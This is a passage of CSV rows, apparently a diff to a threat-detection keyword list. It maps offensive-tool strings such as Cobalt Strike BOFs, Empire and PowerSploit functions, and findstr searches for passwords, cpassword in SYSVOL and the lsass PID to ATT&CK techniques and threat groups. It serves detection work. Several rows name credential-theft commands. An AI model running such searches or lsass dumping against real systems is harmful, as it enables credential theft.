!","N/A","N/A","N/A","N/A","N/A","N/A" +"*findlocaladminaccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*findlocaladminaccess*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Find-LocalAdminAccess*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Find-LocalAdminAccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Find-LocalAdminAccess*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Find-LocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-LocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-LogonScriptCredentials -LogonScripts*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*Find-LogonScriptCredentials.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*FindModule *.dll*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" +"*FindObjects-BOF*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" +"*Find-PathDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-PathDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Find-ProcessDLLHijack*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-ProcessDLLHijack*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*FindProcessTokenAndDuplicate*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*FindProcHandle *lsass*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" +"*Find-ProtectionSoftware*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Find-PSScriptsInPSAppLog*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Find-PSServiceAccounts.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*Find-RDPClientConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*FindSMB2UPTime.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*Findsploit*","offensive_tool_keyword","Findsploit","Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes copysploit to copy any exploit-db exploit to the current directory and compilesploit to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c)","T1210 - T1105 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/Findsploit","1","1","N/A","N/A","10","1493","334","2021-09-27T01:43:24Z","2015-03-16T16:15:55Z"
+"*findstr *BEGIN CERTIFICATE*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*findstr *confidential*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*findstr *cpassword *\sysvol\*.xml*","greyware_tool_keyword","findstr","linux commands abused by attackers - gpp finder","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*findstr *net use*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*findstr *password*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*findstr *vnc.ini*","greyware_tool_keyword","findstr","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*findstr /si secret *.docx*","greyware_tool_keyword","findstr","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*findstr lsass*","offensive_tool_keyword","findstr","findstr used to find lsass pid in order to dump lsass process","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*findstr.exe Tvndrgaaa*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Findsubdomains*","offensive_tool_keyword","findsubdomains","A subdomains discovery tool that collects all possible subdomains from open source internet and validates them through various tools to provide accurate results.","T1590 - T1591 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Information Gathering","https://findsubdomains.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Find-TrustedDocuments*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 